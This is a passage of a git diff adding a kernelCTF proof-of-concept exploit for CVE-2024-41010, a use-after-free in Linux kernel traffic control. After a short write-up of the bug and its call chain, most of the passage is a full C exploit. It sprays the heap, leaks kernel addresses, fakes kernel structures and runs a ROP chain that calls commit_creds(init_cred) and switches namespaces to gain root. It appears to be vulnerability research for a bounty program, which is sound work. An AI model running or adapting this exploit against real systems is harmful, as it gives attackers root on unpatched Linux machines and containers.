*chain0; + + item = kmalloc(sizeof(*item), GFP_KERNEL); + if (!item) { + NL_SET_ERR_MSG(extack, "Memory allocation for head change callback item failed"); + return -ENOMEM; + } + item->chain_head_change = ei->chain_head_change; + item->chain_head_change_priv = ei->chain_head_change_priv; + + mutex_lock(&block->lock); + chain0 = block->chain0.chain; + if (chain0) + tcf_chain_hold(chain0); + else + list_add(&item->list, &block->chain0.filter_chain_list); + mutex_unlock(&block->lock); + + if (chain0) { + struct tcf_proto *tp_head; + + mutex_lock(&chain0->filter_chain_lock); + + tp_head = tcf_chain_dereference(chain0->filter_chain, chain0); + if (tp_head) + tcf_chain_head_change_item(item, tp_head); + + mutex_lock(&block->lock); + list_add(&item->list, &block->chain0.filter_chain_list); // <==[6] + mutex_unlock(&block->lock); + + mutex_unlock(&chain0->filter_chain_lock); + tcf_chain_put(chain0); + } + + return 0; +} +``` + +Finally, when the namespace to which the current network device belongs is closed, the `cleanup_net()` worker is called, resulting in a Use-After-Free condition. + +```c +cleanup_net() + => ops_exit_list() + => default_device_exit_batch() + => unregister_netdevice_many() + => unregister_netdevice_many_notify() + => dev_shutdown() + => qdisc_put() + => clsact_destroy() + => tcf_block_put_ext() + => tcf_chain0_head_change_cb_del() + => tcf_chain_head_change_item() + => clsact_chain_head_change() + => mini_qdisc_pair_swap() +``` + +The function where the Use-After-Free ultimately occurs is `mini_qdisc_pair_swap()`. This function retrieves `*miniqp->p_miniq` [7] and writes a value to `->rcu_state` [8]. Since `miniqp->p_miniq` is pointing to the already freed `&tcx_entry->miniq` [5], a UAF condition occurs. diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/Makefile b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/Makefile new file mode 100644 index 00000000..99fa02e5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/Makefile @@ -0,0 +1,22 @@ +# define complier type +CC = gcc +# compile options setting +CFLAGS = -O2 -static -w +# library link & option setting +LDFLAGS = + +SUBDIRS = modules +clean_subdirs: + @for dir in $(SUBDIRS); do \ + $(MAKE) -C $$dir clean; \ + done + +exploit: exploit.c modules/helper.o modules/pipe.o modules/xattr.o modules/msg_msg.o + $(CC) $(CFLAGS) $^ -o $@ $(LIBS) $(INCLUDES) $(LDFLAGS) + +all: + $(MAKE) exploit + +clean: + $(MAKE) clean_subdirs + rm -f *.o exploit \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit new file mode 100755 index 00000000..0f216475 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c new file mode 100644 index 00000000..6d209744 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c @@ -0,0 +1,871 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include + +#include + +#include "modules/pipe.h" +#include "modules/xattr.h" +#include "modules/helper.h" +#include "modules/msg_msg.h" + + +#define BITMASK(bf_off,bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) +#define STORE_BY_BITMASK(type,htobe,addr,val,bf_off,bf_len) *(type*)(addr) = htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) + +#ifndef NFT_CHAIN_BINDING +#define NFT_CHAIN_BINDING (1 << 2) +#endif + +#define FIRST_SPRAY_SZ 0x1d00 +#define SECOND_SPRAY_SZ (FIRST_SPRAY_SZ + 0x400) +#define THIRD_SPRAY_SZ (SECOND_SPRAY_SZ + 0x400) + +#define MTYPE_PRIMARY 0x41 + +#define CC_OVERFLOW_FACTOR 1 +#define OBJS_PER_SLAB 16 +#define CPU_PARTIAL (24 * 6) +#define OBJS_FRONT 48 + +#define TMPFS_MOUNT_POINT "/tmp/tmpfs_mountpoint" + +#define XATTR_FILE "/tmp/a" +#define XATTR_VALUE "value" + +#define XATTR_PADDING_STR "security.attr" +#define ATTRIBUTE_NAME_LEN 0x100 +#define VALUE_NAME_LEN 0x400 - 0x20 +#define HEAD_VALUE_NAME_LEN 0x100 +#define FILENAME_LEN 0x80 + +int spray_qids[0x1000]; + +uint64_t usleep_time = 5000000; +uint64_t prefix_spray_cnt = 0; +uint64_t ignore_xattr_idx[] = {-1, -1, -1, -1, -1, -1, -1, -1, -1, -1}; +struct pipeio *glb_pipes[0x600] = {0, }; + +int passer; +char *dupfile = NULL; +char *dupattr = NULL; + +uint64_t kbase = 0, kheap_leak = 0; + +void pre_make_mount_dir(char *fname) +{ + for(int i=0; i<0x8000; i++) + { + char mount_fldname[0x100]; + snprintf(mount_fldname, 0x100, "%s-%05d", fname, i); + + struct stat sb; + if(stat(mount_fldname, &sb)) + mkdir(mount_fldname, 0644); + } +} + +void mount_file(char *fname, int idx) +{ + char mount_fldname[0x100]; + snprintf(mount_fldname, 0x100, "%s-%05d", fname, idx); + if (mount("none", mount_fldname, "tmpfs", 0, NULL) < 0) { + fprintf(stderr, "mount %s(type: tmpfs): %s\n", mount_fldname, strerror(errno)); + printf("[-] cross cache: mount fail\n"); + } +} + +void umount_file(char *fname, int idx) +{ + char mount_fldname[0x100]; + snprintf(mount_fldname, 0x100, "%s-%05d", fname, idx); + if (umount(mount_fldname) < 0) { + fprintf(stderr, "umount %s(type: tmpfs): %s\n", mount_fldname, strerror(errno)); + printf("[-] cross cache: umount fail\n"); + } +} + +void cross_cache_spray1() +{ + for(int i=0; i VALUE_NAME_LEN) + { + printf("[+] overwrite success! let's leak (rcu_counter = %lx)\n", length); + dupfile = strdup(filename); + dupattr = strdup(attribute_name); + + return leak; + } + return NULL; +} + +void leak_xattr2(const char *filename, char *attribute_name) { + char *leak = (char *)calloc(sizeof(char), 0x10000); + int length = 0; + if((length = getxattr(filename, attribute_name, leak, 0x10000)) < 0) + panic("getxattr"); +} + +void spray_simple_xattr_for_leak_first(uint32_t cnt) { + char file_name[FILENAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_8K]; + char attribute_name[XATTR_VALUE_KMALLOC_CG_8K]; + + for (uint64_t i = prefix_spray_cnt; i < prefix_spray_cnt + cnt; i++) { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + + *(uint64_t *)value_name = i; + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_128+1, true); + + if(i % 0x10 == 0) + { + glb_pipes[(i - prefix_spray_cnt)/0x10] = create_pipeio(); + resize_pipe(glb_pipes[(i - prefix_spray_cnt)/0x10], PIPE_BUFFER_KMALLOC_CG_192); + activate_ops(glb_pipes[(i - prefix_spray_cnt)/0x10]); + } + } +} + +void spray_simple_xattr_for_leak_second(uint32_t cnt) { + + char file_name[FILENAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_8K] = {0, }; + char attribute_name[XATTR_VALUE_KMALLOC_CG_8K]; + + for (uint64_t i = prefix_spray_cnt; i < prefix_spray_cnt + cnt; i++) { + + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + + snprintf(value_name, VALUE_NAME_LEN, "security.value%05lu-%s", i, XATTR_PADDING_STR); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 3, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_2K, true); + + snprintf(value_name, VALUE_NAME_LEN, "security.value%05lu-%s", i, XATTR_PADDING_STR); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 7, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_2K, true); + } +} + +char *read_simple_xattr_for_leak(uint32_t idx) { + + char file_name[FILENAME_LEN]; + char attribute_name[ATTRIBUTE_NAME_LEN]; + + /* Need that the name is allocated within `kmalloc-256` */ + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, idx/3); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR); + return leak_kheap(file_name, attribute_name); +} + +void pre_make_xattr_file(const char *str, uint64_t last) +{ + int fd = creat(str, 0644); + if(fd < 0) + panic("creat"); + close(fd); + for (uint64_t i = prefix_spray_cnt; i < prefix_spray_cnt + last; i++) { + char file_name[FILENAME_LEN]; + snprintf(file_name, FILENAME_LEN, "%s-%08d", str, i); + int fd = creat(file_name, 0644); + if(fd < 0) + panic("creat"); + close(fd); + } +} + +uint64_t info; +int sock1, sock2, sock3; + +void set_network() +{ + int res; + + mmap(0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul); + + res = socket(0x10ul, 3, 0); + if (res != -1) + sock1 = res; + res = socket(0x10ul, 3, 0); + if (res != -1) + sock2 = res; + res = socket(0x10ul, 3ul, 0); + if (res != -1) + sock3 = res; + + *(uint64_t*)0x20000040 = 0; + *(uint32_t*)0x20000048 = 0; + *(uint64_t*)0x20000050 = 0x20000100; + *(uint64_t*)0x20000058 = 1; + *(uint64_t*)0x20000060 = 0; + *(uint64_t*)0x20000068 = 0; + *(uint32_t*)0x20000070 = 0; + + *(uint64_t*)0x20000100 = 0x20000240; + *(uint64_t*)0x20000108 = 0x24; + + *(uint32_t*)0x20000240 = 0x24; + *(uint16_t*)0x20000244 = 0x24; + *(uint16_t*)0x20000246 = 0; + *(uint32_t*)0x20000248 = 0; + *(uint32_t*)0x2000024c = 0; + + *(uint8_t*)0x20000250 = 0; + *(uint8_t*)0x20000251 = 0; + *(uint16_t*)0x20000252 = 0; + *(uint32_t*)0x20000254 = 0; + *(uint32_t*)0x20000258 = 0; + *(uint32_t*)0x2000025c = 0; + *(uint32_t*)0x20000260 = 0; + + sendmsg(sock3, 0x20000040ul, 0ul); + + *(uint32_t*)0x20000100 = 0x14; + res = getsockname(sock3, (struct sockaddr *)0x20000080ul, 0x20000100ul); + if (res != -1) + info = *(uint32_t*)0x20000084; + + *(uint64_t*)0x20000040 = 0; + *(uint32_t*)0x20000048 = 0; + *(uint64_t*)0x20000050 = 0x20000000; + *(uint64_t*)0x20000058 = 1; + *(uint64_t*)0x20000060 = 0; + *(uint64_t*)0x20000068 = 0; + *(uint32_t*)0x20000070 = 0; + + *(uint64_t*)0x20000000 = 0x200008c0; + *(uint64_t*)0x20000008 = 0x48; + + memcpy((void*)0x200008c0, "\x48\x00\x00\x00\x10\x00\x05\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90", 20); + *(uint32_t*)0x200008d4 = info; + memcpy((void*)0x200008d8, "\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x12\x00\x0c\x00\x01\x00\x76\x65\x74\x68", 20); + + sendmsg(sock2, 0x20000040ul, 0ul); +} + +__attribute__((always_inline)) void qdisc_init() +{ + /* iovec */ + *(uint64_t*)0x300006c0 = 0; + *(uint32_t*)0x300006c8 = 0; + *(uint64_t*)0x300006d0 = 0x30000780; + *(uint64_t*)0x300006d8 = 1; + *(uint64_t*)0x300006e0 = 0; + *(uint64_t*)0x300006e8 = 0; + *(uint32_t*)0x300006f0 = 0; + + *(uint64_t*)0x30000780 = 0x30000480; + *(uint64_t*)0x30000788 = 0x54 + 0xc; + + + /* struct nlmsghdr */ + *(uint32_t*)0x30000480 = 0x54 + 0xc; // nlmsg_len + *(uint16_t*)0x30000484 = 0x24; // nlmsg_type + *(uint16_t*)0x30000486 = 0xf1d; // nlmsg_flags + *(uint32_t*)0x30000488 = 0; // nlmsg_seq + *(uint32_t*)0x3000048c = 0; // nlmsg_pid + + /* struct tcmsg */ + *(uint8_t*)0x30000490 = 0; + *(uint8_t*)0x30000491 = 0; + *(uint16_t*)0x30000492 = 0; + *(uint32_t*)0x30000494 = info; + *(uint16_t*)0x30000498 = 0; + *(uint16_t*)0x3000049a = 0; + *(uint16_t*)0x3000049c = 0xfff1; + *(uint16_t*)0x3000049e = -1; + *(uint16_t*)0x300004a0 = 0; + *(uint16_t*)0x300004a2 = 0; + + /* struct nlattr */ + *(uint16_t*)0x300004a4 = 0xb; + *(uint16_t*)0x300004a6 = 1; // TCA_KIND + /* payload */ + memcpy((void*)0x300004a8, "ingress\000", 8); + /* struct nlattr */ + *(uint16_t*)0x300004b0 = 0x24; + STORE_BY_BITMASK(uint16_t, , 0x300004b2, 8, 0, 14); + STORE_BY_BITMASK(uint16_t, , 0x300004b3, 0, 6, 1); + STORE_BY_BITMASK(uint16_t, , 0x300004b3, 1, 7, 1); + *(uint16_t*)0x300004b4 = 0x1c; + *(uint16_t*)0x300004b6 = 1; + *(uint8_t*)0x300004b8 = 0; + *(uint8_t*)0x300004b9 = 0; + *(uint16_t*)0x300004ba = 0; + *(uint32_t*)0x300004bc = 0; + *(uint32_t*)0x300004c0 = 0; + *(uint32_t*)0x300004c4 = 0; + *(uint32_t*)0x300004c8 = 0; + *(uint32_t*)0x300004cc = 0; + *(uint16_t*)0x300004d0 = 4; + *(uint16_t*)0x300004d2 = 2; + /* struct nlattr */ + *(uint16_t*)0x300004d4= 0xc; // nla_len + *(uint16_t*)0x300004d6 = 13; // nla_type + /* payload */ + *(uint64_t*)0x300004d8 = 1; +} + +__attribute__((always_inline)) void qdisc_set(char *kind) +{ + strcpy((void*)0x300004a8, kind); + syscall(__NR_sendmsg, /*fd=*/sock1, /*msg=*/0x300006c0ul, /*f=*/0ul); +} + +__attribute__((always_inline)) void chain0(void) +{ + *(uint64_t*)0x30010280 = 0; + *(uint32_t*)0x30010288 = 0; + *(uint64_t*)0x30010290 = 0x30010240; + *(uint64_t*)0x30010298 = 1; + *(uint64_t*)0x300102a0 = 0; + *(uint64_t*)0x300102a8 = 0; + *(uint32_t*)0x300102b0 = 0; + + *(uint64_t*)0x30010240 = 0x30010340; + *(uint64_t*)0x30010248 = 0x24; + + /* struct nlmsghdr */ + *(uint32_t*)0x30010340 = 0x24; // nlmsg_len + *(uint16_t*)0x30010344 = 100; // nlmsg_type + *(uint16_t*)0x30010346 = 0xf31; // nlmsg_flags + *(uint32_t*)0x30010348 = 0; // nlmsg_seq + *(uint32_t*)0x3001034c = 0; // nlmsg_pid + + /* struct tcmsg */ + *(uint8_t*)0x30010350 = 0; // tcm_family + *(uint8_t*)0x30010351 = 0; // tcm__pad1 + *(uint16_t*)0x30010352 = 0; // tcm__pad2 + *(uint32_t*)0x30010354 = 0xFFFFFFFF; // tcm_ifindex + *(uint16_t*)0x30010358 = 0; // tcm_handle + *(uint16_t*)0x3001035a = 0; + *(uint32_t*)0x3001035c = 1; // tcm_parent // tcm_block_index + *(uint16_t*)0x30010360 = 0; // tcm_info + *(uint16_t*)0x30010362 = 0; + + syscall(__NR_sendmsg, /*fd=*/sock1, /*msg=*/0x30010280ul, /*f=*/0ul); +} + +void trigger_uaf_write(int pip1[], int pip2[], int affi) +{ + int fd; + uint64_t t[4] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0x0}; + intptr_t ret = 0; + char step[10]; + + cpu_affinity(affi); + unshare_setup(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET); + + set_network(); + + syscall(__NR_mmap, /*addr=*/0x30000000ul, /*len=*/0x1000000ul, /*prot=*/7ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); + + ret = syscall(__NR_sendmsg, /*fd=*/sock1, /*msg=*/0x300006c0ul, /*f=*/0ul); + + qdisc_init(); + qdisc_set("ingress"); + + chain0(); + + qdisc_set("clsact"); + read(pip1[0], step, 10); + /* ------------- change to ingress (ctx alloc) ---- ------- */ + + cross_cache_spray1(); + + qdisc_set("ingress"); + + if(!passer) + { + syscall(SYS_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); // kfree_rcu wait + usleep(usleep_time); + } + + cross_cache_spray2(); + cross_cache_remove_all_chunk(); + + + write(pip2[1], "step 2", 4); + /* ------------ uaf write ------------ */ + read(pip1[0], step, 10); + + _exit(0); +} + + +uint64_t *trigger_spray_chunks(int pip1[], int pip2[]) +{ + char step[10]; + + unshare_setup(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET); + spray_simple_xattr_for_leak_first(FIRST_SPRAY_SZ); + + /* ------------- --------------- */ + + write(pip1[1], "step 1", 4); + read(pip2[0], step, 10); + + spray_simple_xattr_for_leak_second(FIRST_SPRAY_SZ); + printf("[+] spray xattr, which would be overwriten\n"); + + /* -------------------- ------------------------- */ + + write(pip1[1], "step 3", 4); + + /* ---------------------- heap oob read ---------------------------------- */ + printf("[*] waiting for exit...\n"); + usleep(100000); + + uint64_t *leaks; + for(int i=0; i> 24) - 1) << 24); // memory_stats+352 + break; + } + } + + printf("[+] kbase: 0x%llx\n", kbase); + + return leaks; +} + +void set_simple_xattr_for_fake_rbtree_first(uint64_t fname_idx, uint64_t attr_name, uint64_t conn1, uint64_t conn2) +{ + char file_name[FILENAME_LEN]; + char value_name[VALUE_NAME_LEN]; + char attribute_name[ATTRIBUTE_NAME_LEN]; + + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, fname_idx); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR); + remove_xattr(file_name, attribute_name, false); + + struct simple_xattr *new_xattr = fake_xattr(RB_RED, conn1, conn2, 0x0, attr_name + 0x28, 0x10, NULL, 0x0); + + memset(value_name, 0, VALUE_NAME_LEN); + memcpy(value_name + 0x40 - sizeof(struct simple_xattr), (char *)new_xattr, 0x30); // if chunk is 0x---180 -> 0x---100 (from 0xc0) + memcpy(value_name + 0x80 - sizeof(struct simple_xattr), (char *)new_xattr, 0x30); // if chunk is 0x---240 -> 0x---200 (from 0x180) + + for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + SECOND_SPRAY_SZ; i++) + { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true); + } + + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, fname_idx); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 1, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true); + + for(int i=prefix_spray_cnt + SECOND_SPRAY_SZ; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++) + { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true); + } + + free(new_xattr); +} + +void spray_simple_xattr_for_fake_rbtree_second(uint64_t target) +{ + char file_name[ATTRIBUTE_NAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_32K*2]; + + for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + SECOND_SPRAY_SZ; i++) + { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + char *attribute_name = gen_xattr_name(XATTR_PREFIX_SECURITY, "attr1"); + for(int i=0; i --------------- */ + write(pip1[1], "step 1", 4); + read(pip2[0], step, 10); + + spray_simple_xattr_for_fake_rbtree_second(target); + printf("[+] spray xattr, which would be overwriten\n"); + + /* -------------------- ------------------------- */ + write(pip1[1], "step 3", 4); + + /* ---------------------- heap oob read ---------------------------------- */ + printf("[*] waiting for exit...\n"); + usleep(100000); +} + +void spray_msgmsg_for_overwrite_pipe_buffer(uint64_t cnt, uint64_t fake_page, uint64_t fake_ops, uint64_t call_func_addr) { + char buffer[0x2000] = {0}; + + struct pipe_buffer *fake_pipebuf = fake_pipe_buffer(fake_page, 0x0, 0x0, fake_ops, 0x10, 0x40); + ((uint64_t *)buffer)[0] = call_func_addr; + memcpy(buffer + 0x20, fake_pipebuf, sizeof(struct pipe_buffer)); + + for (int i = 0; i < cnt; i++) { + int msqid = alloc_msg_queue(); + + spray_qids[i] = msqid; + insert_msg_msgseg(msqid, MTYPE_PRIMARY, MSG_MSGSEG_KMALLOC_CG_64, MSG_MSGSEG_KMALLOC_CG_64, buffer); + } +} + +uint64_t read_msgmsg_for_leak_vmemmap_base(uint64_t cnt) { + uint64_t vmemmap_base = 0; + + for(int i=0; i < cnt; i++) + { + char *buf = read_msg_msgseg(spray_qids[i], MTYPE_PRIMARY, MSG_MSGSEG_KMALLOC_CG_64); + + if( (((uint64_t *)(buf))[4] >> 48) == 0xffff) + { + vmemmap_base = ((uint64_t *)(buf))[4]; + break; + } + } + return vmemmap_base; +} + +void cleanup() +{ + char file_name[FILENAME_LEN]; + int fd = remove(XATTR_FILE); + if(fd < 0) + panic("remove"); + + for (uint64_t i = prefix_spray_cnt; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++) { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + int fd = remove(file_name); + if(fd < 0) + panic("remove"); + + } +} + +void cleanup2(int except) +{ + if(prefix_spray_cnt == 0) + prefix_spray_cnt += THIRD_SPRAY_SZ; + else + prefix_spray_cnt += THIRD_SPRAY_SZ - FIRST_SPRAY_SZ; +} + +void cleanup_cg_192() +{ + char file_name[FILENAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_8K] = {0, }; + char attribute_name[XATTR_VALUE_KMALLOC_CG_8K]; + + for (uint64_t i = 0x1000; i < FIRST_SPRAY_SZ; i++) { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + snprintf(value_name, VALUE_NAME_LEN, "security.value%05lu-%s", i, XATTR_PADDING_STR); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 9, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true); + } +} + +int run(void) +{ + pid_t pid; + int pip1[2], pip2[2], pip3[2]; + char step[10]; + uint64_t handle_num; + int p1; + int status1; + pthread_t hdr1; + + passer = 0; + + struct regs *sr = save_state(); + + pipe(pip1); + pipe(pip2); + pipe(pip3); + + if(!fork()) + exit(0); + + cpu_affinity(0); + pre_make_mount_dir(TMPFS_MOUNT_POINT); + pre_make_xattr_file(XATTR_FILE, 0x10000); + + if (!fork()) + trigger_uaf_write(pip1, pip2, 0); + + uint64_t *leaks = trigger_spray_chunks(pip1, pip2); + + for(int i=0; i<0x500; i++) + release_pipe(glb_pipes[i]); + + if (!leaks) + { + printf("[-] fail on get xattr node info, cleanup it\n"); + cleanup(); + return -1; + } + + uint64_t lnode = 0, rnode = 0, attr_name_ptr = 0; + + typedef struct { + struct simple_xattr xattr; + int fname_idx; + } xattr_node_leak; + + xattr_node_leak nodes[0x4000/(0x40/0x8)]; + int nodes_cnt = 0, nodes_front = 0; + for(int i=0; i < 0x4000/(0x40/0x8); i+=0x40/0x8) + { + if(leaks[0x17 + i] == 0x59 && leaks[0x14 + i] && leaks[0x15 + i] && leaks[0x16 + i] && leaks[0x18 + i]) + { + nodes[nodes_cnt].xattr.rb_node.rb_right = leaks[0x14 + i]; + nodes[nodes_cnt].xattr.rb_node.rb_left = leaks[0x15 + i]; + nodes[nodes_cnt].xattr.name = leaks[0x16 + i]; + nodes[nodes_cnt].fname_idx = leaks[0x18 + i]; + nodes_cnt++; + } + } + + printf("[*] total leak cnts: %d\n", nodes_cnt); + + if(nodes_cnt < 5) + { + printf("[-] fail on get enough xattr node info, cleanup it\n"); + cleanup(); + return -1; + } + if(kbase == 0) + { + printf("[-] fail on get kbase, cleanup it\n"); + cleanup(); + return -1; + } + + printf("[+] success, leak xattr and kbase\n"); + + cleanup_cg_192(); + + passer = 1; + +retry_1bit_off: + if (!fork()) + trigger_uaf_write(pip1, pip2, 0); + + generate_fake_rbtree(pip1, pip2, (uint64_t)nodes[nodes_front].fname_idx, + (uint64_t)nodes[nodes_front].xattr.rb_node.rb_right + 1, + (uint64_t)nodes[nodes_front].xattr.name, + (uint64_t)nodes[nodes_front].xattr.rb_node.rb_left, + (uint64_t)nodes[nodes_front].xattr.rb_node.rb_left - 0x18); + + char file_name[FILENAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_8K] = {0, }; + char attribute_name[XATTR_VALUE_KMALLOC_CG_8K]; + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, nodes[nodes_front].fname_idx); + + printf("[*] try to remove fake xattr\n"); + if(remove_xattr(file_name, "security.attr", false) < 0) + { + printf("[-] fail on remove_xattr, cleanup it\n"); + cleanup2(nodes[nodes_front].fname_idx); + nodes_front++; + passer = 0; + goto retry_1bit_off; + } + + struct pipeio *pipes[0x1f8]; + for(int i=0; i<0x1f8; i++) + { + pipes[i] = create_pipeio(); + resize_pipe(pipes[i], PIPE_BUFFER_KMALLOC_CG_64); + } + + printf("[+] pipe alloc fin\n"); + + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-", 1); + remove_xattr_noerror(file_name, attribute_name); + + for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++) + { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-", 5); + remove_xattr_noerror(file_name, attribute_name); + } + + spray_msgmsg_for_overwrite_pipe_buffer(0x300, 0x0, 0x0, 0x0); + + for(int i=0; i<0x1f8; i++) + activate_ops(pipes[i]); + + uint64_t vmemmap_base = (read_msgmsg_for_leak_vmemmap_base(0x300) >> 28) << 28; + uint64_t kheap_base = (((((uint64_t)nodes[nodes_front].xattr.rb_node.rb_right - 0x6000000) >> 28) - 0x10) << 28); + uint64_t longjump_victim_address = kbase + 0x2c51a40; + + printf("[*] page_offset_base: 0x%llx\n", kheap_base); + printf("[*] vmemmap base: 0x%llx\n", vmemmap_base); + printf("[*] longjump victim address: 0x%llx\n", longjump_victim_address); + if(vmemmap_base == 0) + { + printf("[-] fail on get vmemmap_base, cleanup it"); + cleanup(); + return -1; + } + + uint64_t wakeup_long64 = kbase + 0x12c291; + + printf("[*] spray msg_msg again\n"); + spray_msgmsg_for_overwrite_pipe_buffer(0x300, + virt2page(longjump_victim_address & (~0xfff), kheap_base, vmemmap_base), + nodes[nodes_front].xattr.name, wakeup_long64 + ); + + uint64_t init_cred = kbase + 0x2c72d60; + uint64_t commit_cred = kbase + 0x001f5520; + uint64_t prepare_kernel_cred = kbase + 0x001f57d0; + uint64_t ret_from_fork = kbase + 0x10d430; + uint64_t msleep = kbase + 0x271300; + + uint64_t find_task_by_vpid = kbase + 0x1e8d60; + uint64_t switch_task_namespaces = kbase + 0x1f31c0; + uint64_t set_memory_x = kbase + 0x001551f0; + + uint64_t init_nsproxy = kbase + 0x2c72880; + + uint64_t ret = kbase + 0x5a1; + + // wakeup_long64 + uint64_t longjump[] = { + 0x0, // rbp + 0x1, // rsi + longjump_victim_address & (~0xfff), // rdi + 0x0, // rbx + ret, // rip -> ret + longjump_victim_address + 0x8*6, // rsp -> stack pivot to longjump victim address + + set_memory_x, + + longjump_victim_address + 0x8*0x18, // pop rdi; ret; + init_cred, + commit_cred, // commit_cred(init_cred); + + longjump_victim_address + 0x8*0x18, // pop rdi; ret; + 1, + find_task_by_vpid, // find_task_by_vpid(1) + + longjump_victim_address + 0x8*0x1a, // mov rdi, rax; ret; + + longjump_victim_address + 0x8*0x19, // pop rsi; ret; + init_nsproxy, + switch_task_namespaces, // switch_task_namespaces(task, init_nsproxy) + + longjump_victim_address + 0x8*0x1b, // swapgs; iretq; + 0x0, + sr->cs, + sr->rflags, + sr->rsp, + sr->ss, + 0x0, // 23 + + 0xc35f, // pop rdi; ret -> idx: 0x18 + 0xc35e, // pop rsi; ret + 0xc3c78948, // mov rdi, rax; ret + 0xcf48f8010f, // swapgs; iretq; + }; + + printf("[+] target: 0x%llx\n", nodes[nodes_front].xattr.name); + + for(int i=0; i<0x1f8; i++) + write_pipe(pipes[i], ((char *)&longjump - (longjump_victim_address&0xfff)), + (longjump_victim_address&0xfff) + sizeof(longjump)); + + signal(SIGSEGV, get_shell); + + printf("[*] execute fake ops\n"); + + for(int i=0; i<0x1f8; i++) + release_pipe(pipes[i]); + + return 0; +} + + +int main(int argc, char *argv[]) +{ + while(run() < 0); +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/.gitignore b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/.gitignore new file mode 100644 index 00000000..15309787 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/.gitignore @@ -0,0 +1 @@ +*.o \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/Makefile 